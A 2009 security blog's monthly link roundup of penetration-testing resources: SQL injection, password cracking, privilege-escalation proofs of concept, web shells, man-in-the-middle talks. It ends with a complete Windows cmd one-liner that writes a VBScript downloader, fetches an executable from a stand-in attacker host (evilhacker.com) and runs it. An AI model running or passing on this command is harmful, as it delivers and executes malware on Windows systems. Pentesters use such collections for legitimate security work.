Mubix's Links: March 2009

Wednesday, March 25, 2009

SQL Injection Not Just 1=1 Slides

Good slide deck on SQLMap - one of those greatly underestimated tools:

http://www.slideshare.net/inquis/sql-injection-not-only-and-11

Cracking passwords with Wikipedia

Sebastien Raveau shares his secret with cracking passwords using not the dictionary, but Wikipeda. Combine this with the wordlist based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau

Sunday, March 22, 2009

Full Scope Security's Vimeo Channel

http://vimeo.com/channels/fullscopesecurity

Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/

Wednesday, March 18, 2009

MetaSploit Meterpreter Screenshot Script

http://ethackal.com/news/metasploit-meterpreter-script-screenshot/

Monday, March 16, 2009

And we have Holograms

Yes, I know this isn't technically a hologram, but it's damn cool:
http://gl.ict.usc.edu/Research/3DDisplay/

Sunday, March 15, 2009

Penetration Testing Massive Links

This should keep you busy for a long while...

http://www.vulnerabilityasse ssment.co.uk/Penetration%20Test.html

http://penetrationtests.com/

Token Kidnapping - Privilege Escalation Win2k3 / Win2k8

Privilege Escalation or "Token Kidnapping" for -
Windows 2003: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
Windows 2008: http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html

Check out the other awesomeness he has on his site.

VMWorld Europe 2009 Videos

Not sure if I posted this already or not, but this guy has some awesome other videos too:
http://www.boche.net/blog/index.php/2009/03/01/vmworld-europe-2009-videos/

10 Papers Every Programmer Should Read

.. at least twice... I have read 6 of them and I certainly agree. I'll push the rest to my Kindle once it arrives.

http://blog.objectmentor.com/articles/2009/02/26/10-papers-every-programmer-should-read-at-least-twice

TuxTraining

Free online linux crash courses, blog post style:
http://tuxtraining.com/

Index of / Rootsecure.net Tutorials (pdf)

http://www.rootsecure.net/content/downloads/pdf/

Saturday, March 14, 2009

Wireless Security Tools

Stumbled across this list of Wireless tools
http://www.corecom.com/html/wlan_tools.html

SQL Injection for Oracle (pdf)

http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf

Free Tools - Inguardians

http://www.inguardians.com/tools/

Free Tools - Joshua Wright

http://willhackforsushi.com/Offensive.html

http://willhackforsushi.com/Defensive.html

Free Tools - SecureState

https://www.securestate.com/Pages/Free-Tools.aspx

Uninformed PT and RE ezine

http://uninformed.org/index.cgi

Preventing SEH Overwrites

http://blogs.technet.com/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx

The "Ultimate" list of Fuzzers

Doesn't seem very "Ultimate" but its a good list:
http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

c99madshell.php

You figure out what it is: http://www.derekfountain.org/security_c99madshell.php

Active Man in the Middle Attack

A presentation by Adi Sharabani from IBM on MITM:
http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html

Friday, March 13, 2009

Social Engineering Webcast

Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

Wednesday, March 11, 2009

Shell Greed

On twitter I post a long shell command that would boot/kick off a system every other user. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

Tuesday, March 10, 2009

HTML to PDF

The site just just as it says. Has a ton of applications, but the one I'm interested in at the moment, is using to to throw things on my Kindle for later reading.
http://www.html-pdf-converter.com/

Abusing Citrix - Part 1

An old hack that still works. Awesome:
http://synjunkie.blogspot.com/2009/03/abusing-citrix-part-1.html

PHP Shell Injection through PHP Log Parsing

http://securitytube.net/PHP-Shell-Injection-on-a-Website-through-Log-Poisoning-video.aspx

Monday, March 9, 2009

Public Rainbow-Tables

Oldie but a goodie that you just might not know about:
http://www.plain-text.info

Saturday, March 7, 2009

One LONG line wget for windows

"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"